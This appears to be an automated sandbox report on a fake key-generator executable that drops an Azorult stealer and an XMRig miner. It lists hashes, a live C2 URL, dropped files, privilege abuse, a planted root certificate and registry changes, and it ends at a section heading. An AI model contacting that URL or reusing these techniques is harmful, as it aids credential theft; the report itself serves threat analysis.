Analysis
-
max time kernel
23s -
max time network
62s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
02-04-2021 21:07
Static task
static1
Behavioral task
behavioral1
Sample
Easeus.Mobisaver.3.5.key.generator.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Easeus.Mobisaver.3.5.key.generator.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Easeus.Mobisaver.3.5.key.generator.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Easeus.Mobisaver.3.5.key.generator.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
Easeus.Mobisaver.3.5.key.generator.exe
Resource
win7v20201028
General
-
Target
Easeus.Mobisaver.3.5.key.generator.exe
-
Size
5.4MB
-
MD5
2a2be5dbf78e57ac4fd460faa2a52488
-
SHA1
8e0791500aeb17c4dc950e1a8c90d6036fb49d5b
-
SHA256
b66f057295395c28f1dd0d6807ac2c174885235d63ab3f3ff5b3d87719780228
-
SHA512
8715562e1b9e7c2357f95f3beb66383de7ec16d4dfbf7f0230a922ea420d27378e22ced50ee9d7e0da30a05bf269d5a07ca1a736b1b0828f3afbdfc8c10b9038
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
XMRig Miner Payload 3 IoCs
resource yara_rule behavioral1/memory/2856-158-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral1/memory/2856-160-0x00000001402CA898-mapping.dmp xmrig behavioral1/memory/2856-162-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 12 IoCs
pid Process 976 keygen-pr.exe 412 keygen-step-1.exe 2272 keygen-step-3.exe 1176 keygen-step-4.exe 2584 Setup.exe 1124 key.exe 3808 multitimer.exe 3892 setups.exe 2240 askinstall20.exe 2968 setups.tmp 4288 Full Program Features.exe 4384 file.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 2968 setups.tmp 2968 setups.tmp 2968 setups.tmp 2968 setups.tmp 2968 setups.tmp 2968 setups.tmp 2968 setups.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 66 api.ipify.org 118 ipinfo.io 120 ipinfo.io -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\unins0000.dat Full Program Features.exe File created C:\Program Files\unins0000.dll Full Program Features.exe File created C:\Program Files\unins.vbs Full Program Features.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 6036 5220 WerFault.exe 127 5144 5220 WerFault.exe 127 5276 5220 WerFault.exe 127 -
Kills process with taskkill 1 IoCs
pid Process 2820 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{01E184BF-2154-4BD0-B191-CEF9A3084D38} = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ca1668761428d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{522301D0-D9B8-4B72-8877-1537E1860D1E}" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 998267c856add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000f2ab7047ece2561be4e92f6bcfd0b1365228f509c0fdff7981e9d08a47e2399afbc35b38d7ba0f034a02175590e97660af1190c3448163c27b7c MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000001b756b13736b50b055a4158e7ca5d9024b9e02b8d7bf1865403753a3043d9dd6c2e782f778b376964decdcdea56d37d71865ef742a0a8ad5da778560a91b64681f6b9dfa80c8172333cda7417f38237ff9ce1889a9037ba32245 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 3656 PING.EXE 4312 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 122 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 119 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2968 setups.tmp 2968 setups.tmp -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeDebugPrivilege 2584 Setup.exe Token: SeCreateTokenPrivilege 2240 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 2240 askinstall20.exe Token: SeLockMemoryPrivilege 2240 askinstall20.exe Token: SeIncreaseQuotaPrivilege 2240 askinstall20.exe Token: SeMachineAccountPrivilege 2240 askinstall20.exe Token: SeTcbPrivilege 2240 askinstall20.exe Token: SeSecurityPrivilege 2240 askinstall20.exe Token: SeTakeOwnershipPrivilege 2240 askinstall20.exe Token: SeLoadDriverPrivilege 2240 askinstall20.exe Token: SeSystemProfilePrivilege 2240 askinstall20.exe Token: SeSystemtimePrivilege 2240 askinstall20.exe Token: SeProfSingleProcessPrivilege 2240 askinstall20.exe Token: SeIncBasePriorityPrivilege 2240 askinstall20.exe Token: SeCreatePagefilePrivilege 2240 askinstall20.exe Token: SeCreatePermanentPrivilege 2240 askinstall20.exe Token: SeBackupPrivilege 2240 askinstall20.exe Token: SeRestorePrivilege 2240 askinstall20.exe Token: SeShutdownPrivilege 2240 askinstall20.exe Token: SeDebugPrivilege 2240 askinstall20.exe Token: SeAuditPrivilege 2240 askinstall20.exe Token: SeSystemEnvironmentPrivilege 2240 askinstall20.exe Token: SeChangeNotifyPrivilege 2240 askinstall20.exe Token: SeRemoteShutdownPrivilege 2240 askinstall20.exe Token: SeUndockPrivilege 2240 askinstall20.exe Token: SeSyncAgentPrivilege 2240 askinstall20.exe Token: SeEnableDelegationPrivilege 2240 askinstall20.exe Token: SeManageVolumePrivilege 2240 askinstall20.exe Token: SeImpersonatePrivilege 2240 askinstall20.exe Token: SeCreateGlobalPrivilege 2240 askinstall20.exe Token: 31 2240 askinstall20.exe Token: 32 2240 askinstall20.exe Token: 33 2240 askinstall20.exe Token: 34 2240 askinstall20.exe Token: 35 2240 askinstall20.exe Token: SeDebugPrivilege 2820 taskkill.exe Token: SeDebugPrivilege 3808 multitimer.exe Token: SeDebugPrivilege 3928 MicrosoftEdge.exe Token: SeDebugPrivilege 3928 MicrosoftEdge.exe Token: SeDebugPrivilege 3928 MicrosoftEdge.exe Token: SeDebugPrivilege 3928 MicrosoftEdge.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3892 setups.exe 2968 setups.tmp 3928 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 55 IoCs
